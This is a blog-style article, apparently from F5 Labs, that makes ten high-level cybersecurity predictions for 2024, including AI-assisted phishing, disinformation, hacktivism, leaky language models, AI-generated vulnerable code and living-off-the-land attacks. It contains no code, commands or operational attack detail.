What does 2024 look through a cybersecurity lens? F5 Labs delves in…
As we peer into the future of cybersecurity, our predictions underscore the need for continuous adaptation and innovation in defending against evolving cyber threats. Whether it’s addressing the socioeconomic disparities in cybersecurity resilience, fortifying edge computing environments, or preparing for seemingly endless AI-driven assaults on our lives, the future cybersecurity landscape demands a proactive and collaborative approach to safeguard our digital future.
Prediction #1: Generative AI will converse with phishing victims
Large language models (LLMs) are set to take over the back-and-forth between phisher and victim.
Organized crime gangs will benefit from no longer needing to employ individuals to translate messages from victim and act as a “support center”. Instead, generative AI will be used to translate messages from the non-native language the attackers use, and respond with authentic sounding responses, coaching the victim along their path of being socially engineered.
By incorporating publicly available personal information to create incredibly lifelike scams, organized cybercrime groups will take the phishing-as-a-service we already know and magnify it both in scale and efficiency.
Prediction #2: Organized crime will use generative AI with fake accounts
There is huge potential for AI-based fake accounts containing posts and images that are indiscernible from real human content. All attack strategies that fake accounts engender, including fraud, credential stuffing, disinformation, and marketplace manipulation, could see an enormous boost in productivity when it costs zero effort to match human realism.
Prediction #3: Nation-states will use generative AI for disinformation
Generative AI tools have the potential to significantly change the way malicious information operations are conducted with fake content creation, automated text generation for disinformation, targeted misinformation campaigns, and circumvention of content moderation.
We have already observed genAI created content being used on a small scale in current conflicts around the world. At a larger scale, we expect to see this used by different actors ahead of major world events which in 2024 including the U.S. Presidential election and the Olympics in Paris.
Concerns, such as these, led to Adobe, Microsoft, the BBC, and others, creating the C2PA standard; a technique to cryptographically watermark the origin of digital media. Time will tell whether this will have any measurable impact.
Prediction #4: Hacktivism will grow thanks to generative AI and technological advancement
Hacktivist activity related to major world events is expected to grow as computing power continues to become more affordable and, crucially, easier to use. Using AI tools and the power of their smartphones and laptops, it is likely that more unsophisticated actors will join the fight in cyber space as hacktivists.
Over the past couple of years, the world observed a resurgence in the volume of hacktivist activity, starting with threat actors expressing support for both sides with the Russian invasion of Ukraine. More recent conflicts, only a small amount of hacktivist activity was initially seen but as violence increases on the physical battlefield, so too have hacktivists moved to progressively more destructive attacks. Intelligence reports have observed availability attacks which include distributed denial-of-service attacks, data leaks, website defacements, and a clear focus on attempting to disrupt critical infrastructure.
With world events like the Olympics, elections, and ongoing wars taking place in 2024, hacktivists are likely to use these opportunities to gain notoriety for their group and sympathy for the causes they support. Attendees, sponsors, and other loosely affiliated organizations are likely to become targets, if not victims of these geopolitically motivated hacktivists. This is likely to extend beyond just targeting individuals but also to targeting companies and organizations that support different causes.
Prediction #5: Web attacks will use real-time input from generative AI
With their impressive ability to create code LLMs can, and will, be used to direct the sequences of procedures during live attacks, allowing attackers to react to defenses as they encounter them.
By leveraging APIs from open genAI systems such as ChatGPT, or by building their own LLMs, attackers will be able to incorporate the knowledge and ideas of an AI system during a live attack on a website or network. Should an attacker’s website attack find itself blocked due to security controls, an AI system can be used to evaluate the response and suggest alternative ways to attack.
Look for LLMs to diversify attack chains to our detriment soon.
Prediction #6: LLLMs (Leaky Large Language Models)
Fresh research has shown disturbingly simple ways in which LLMs can be tricked into revealing their training data, which often includes proprietary and personal data. The rush to create proprietary LLMs could result in many more examples of training data being exposed, if not through novel attacks, then by rushed and misconfigured security controls.
We expect to see some spectacular failures of GenAI-driven tools—such as massive leaks of PII, novel techniques to gain unauthorized access, and denial of service attacks.
As with cloud breaches, the impact of LLMs leaks has the potential to be enormous, because of the sheer quantity of data involved.
Prediction #7: Generative Vulnerabilities
Many developers, seasoned and newbie alike, increasingly look to generative AI to write code or check for bugs. But without the correct safeguards in place, many foresee LLMs creating a deluge of vulnerable code which is difficult to secure. Whilst OSS poses a risk, its benefit has an inherent fix-once approach. Should a vulnerability be discovered in an OSS library, it can be fixed once and then used by everyone who uses that library. With GenAI code generation, every developer will end up with a unique and bespoke piece of code.
Code assistants write code so quickly that developers may not have time to review. Depending on when the LLM was built, it may not even be aware of the latest vulnerabilities, making it impossible for the model to construct code that avoids these vulnerabilities or avoids importing libraries with vulnerabilities.
In the age of generative AI, organizations that prioritize speed over security will inevitably introduce new vulnerabilities.
Prediction #8: Attacks on the Edge
Physical tampering, software and API vulnerabilities, and management challenges are all risks that are exacerbated in an edge context.
Seventy five percent of enterprise data will be generated and processed outside the traditional confines of data centers or the cloud. This paradigm redefines organizational boundaries, since workloads at the edge may harbor sensitive information and privileges.
Just as with MFA, attackers will focus on where their time has the biggest impact. If the shift to edge computing is handled as carelessly as cloud computing can be, expect to see a similar number of high-profile incidents over the coming year.
Prediction #9: Attackers will improve their ability to live off the Land
Growing complexity of IT environments, particularly in cloud and hybrid architectures, will make it more challenging to monitor and detect living-off-the-land (LOTL) attacks.
Attackers are increasingly turning to LOTL techniques that use legitimate management software already present on victim systems to achieve their malicious objectives. To make things worse, LOTL attacks can be incorporated into supply chain attacks to compromise critical infrastructure and disrupt operations.
Unless we improve our visibility in our own networks, expect to see attackers use our own tools against us with increasing frequency.
Prediction #10: Cybersecurity Poverty Matrix
There are growing concerns about the effect that trends in security architecture will have on the security poverty line, a concept advanced more than a decade ago by the esteemed Wendy Nather. The security poverty line is defined as the level of knowledge, authority, and most of all budget necessary to accomplish the bare minimum of security controls.
Today it seems that organizations need security orchestration, automation, and incident response (SOAR), security information and event management (SIEM), vulnerability management tools, and threat intelligence services, as well as programs like configuration management, incident response, penetration testing, and governance, compliance, and risk. Vinberg explains:
The key issue here is that many enterprise organizations choose to consume these controls as managed services, such that the expertise is guaranteed but so is the cost. The heightened cost of entry into each of these niches means that they will increasingly become all-or-nothing, and more organizations will eventually need to choose between them.
In other words, the idea of a simple poverty line no longer captures the tradeoff that exists today between focused capability in one niche and covering all of the bases. Instead of a poverty line we will have a poverty matrix composed of n-dimensions, where n is the number of niches, and even well-resourced enterprises will struggle to put it all together.
Discussion about this post